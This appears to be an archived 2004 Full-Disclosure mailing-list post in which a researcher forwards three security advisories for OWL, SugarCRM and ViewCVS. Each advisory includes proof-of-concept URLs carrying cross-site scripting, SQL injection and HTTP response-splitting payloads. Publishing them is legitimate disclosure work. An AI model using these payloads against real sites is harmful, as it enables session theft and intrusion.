[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-Disclosure] Re: [SECUNIA] Vulnerability postings
From:       Joxean Koret <joxeankoret () yahoo ! es>
Date:       2004-12-31 14:41:17
Message-ID: 1104504078.21698.0.camel () nemobox
[Download RAW message or body]

[Attachment #2 (multipart/signed)]

[Attachment #4 (multipart/mixed)]


On Fri, 2004-12-31 at 07:26 +0100, Thomas Kristensen wrote:
> Hi Jose,
> 
> It appears that you recently discovered some issues in Owl and SugarCRM.
> However, I have not seen any postings on bugtraq or similar lists, the
> only information available is what SecurityFocus has posted in their bid
> database.
> 

Yes, I have been discovered various issues with Owl and SugarCRM (and
also with ViewCVS and GMail). 

I send you attached the advisories for Owl, SugarCRM and ViewCVS.

> I would greatly appreciate if you forwarded your research to
> full-disclosure@lists.netsys.com and vuln@secunia.com to ensure that
> other people than those employed at SF would get access to it.
> 
> Happy new year.
> 
Ok, Happy new year!

Regards.
Joxean Koret

["advisory-15.txt" (advisory-15.txt)]

----------------------------------------------------------------------------
               Various Vulnerabilities in OWL Intranet Engine
----------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004 
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OWL 0.7 and 0.8 -  Owl is a multi user document repository (knowledgebase) 
system written in PHP4 for publishing files/documents onto the web for a 
corporation, small business, group of people, or just for yourself.

Web : http://owl.sourceforge.net/

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerabilities

A1. In the script browser various parameters, that are used to write the
html code, not are verified. 

	Test URLS : 

	http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&ex \
pand=1'><script>alert(document.location)</script>&order=creatorid&sortposted=DESC

	http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&ex \
pand=1&order=creatorid'><script>alert(document.location)</script>&sortposted=DESC


B. SQL Injection Vulnerabilities

B1. In the browser.php script the following parameters are vulnerables to an
SQL Injection attacks.

	Test URLS : 
	
	http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104[SQL%20INJECTION]&expand=1&order=creatorid&sortposted=DESC
  http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104&expand=1&order=creatorid&sortposted=DESC[SQL%20INJECTION]



The fix:
~~~~~~~~

All problems are fixed in the CVS.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory. 

---------------------------------------------------------------------------

Contact:
~~~~~~~~

	Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es


["advisory-14.txt" (advisory-14.txt)]

----------------------------------------------------------------------------
Cross Site Scripting Vulnerabilities and Possible Code Execution in SugarCRM
----------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004 
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SugarCRM 1.X - Manage leads, opportunities, contacts and more inside of a 
state-of-the-art user interface. Built on PHP and MySQL

Web : http://sugarcrm.sourceforge.net

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerability

A1. In the main script (index.php) various parameters, that are used to write the
html code, not are verified. 

At least the following URLs are vulnerables to XSS (Cross Site Scripting) attacks : 

http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module="><script>alert(document.cookie)</script>&return_action=index


http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module=&return_action="><script>alert(document.cookie)</script>


http://<site-with-sugarcrm>/sugarcrm/index.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29 \
%3C%2Fscript%3E&address_city=&website=&phone=&action=ListView&query=true&module=Accounts&button=Search


And the following are XSS vulnerables and, may be, arbitrary PHP remote code execution 
vulnerables as well : 

http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts"><script>alert(document.cookie)</script>&record=d676f046-1be5-dc36-114e-4138f972bf5d


http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts''''&record=[RECORD \
ID]"><script>alert(document.cookie)</script>


The fix:
~~~~~~~~

All problems are fixed in the latests versions availables at the sugarcrm site.
Go to http://sugarcrm.sourceforge.net site for more info about the new versions.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory. 

---------------------------------------------------------------------------

Contact:
~~~~~~~~

	Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es


["advisory-12.txt" (advisory-12.txt)]

---------------------------------------------------------------------------
              Two Vulnerabilities in ViewCVS
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004 
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ViewCVS 0.9.2 - ViewCVS is a browser interface for CVS and Subversion version control \
repositories

ViewCVS can browse directories, change logs, and revisions of files. It can display diffs \
between versions and show selections of files based on tags or branches. In addition, ViewCVS \
has "annotation" / "blame" support, and Bonsai-like query facility

Web : http://viewcvs.sourceforge.net

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerability and/or HTTP Response Splitting

A1. When you want to view any source file that is stored in the CVS repository you can 
select the mime-type to view this (in example, text/html or text/plain). This is a 
parameter that receives thet viewcvs.py script and is not verified.

I'm not sure if this is an HTTP Response Splitting vulnerability and/or a Cross Site Scripting,
but is a security problem.

To try the vulnerabilities you can try the following the Proof of Concepts: 

	Sample 1 :
	~~~~~~~~~~

	http://<site-with-viewcvs-092>/cgi-bin/viewcvs/project/source.file?rev=HEAD&content-type=text/h \
tml%0d%0a%0d%0a<html><body%20bgcolor="black"><font%20size=7%20color=red>XSS%20or%20HTTP%20Response%20Splitting</font></html>


	Sample 2 :
	~~~~~~~~~~

	http://<site-with-viewcvs-092>/cgi-bin/viewcvs/*checkout*/project/source.file?rev=1.0&content-type=text/html%0d%0aContent-Length:1937%0d%0a%0d%0aHi



The fix:
~~~~~~~~

The vendor was contacted but no path for the 0.9.2 version has been released. Anyway, the 
problems has been fixed in the ViewCVS 1.0-dev version available via CVS.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory. 

---------------------------------------------------------------------------

Contact:
~~~~~~~~

	Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es


["signature.asc" (application/pgp-signature)]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic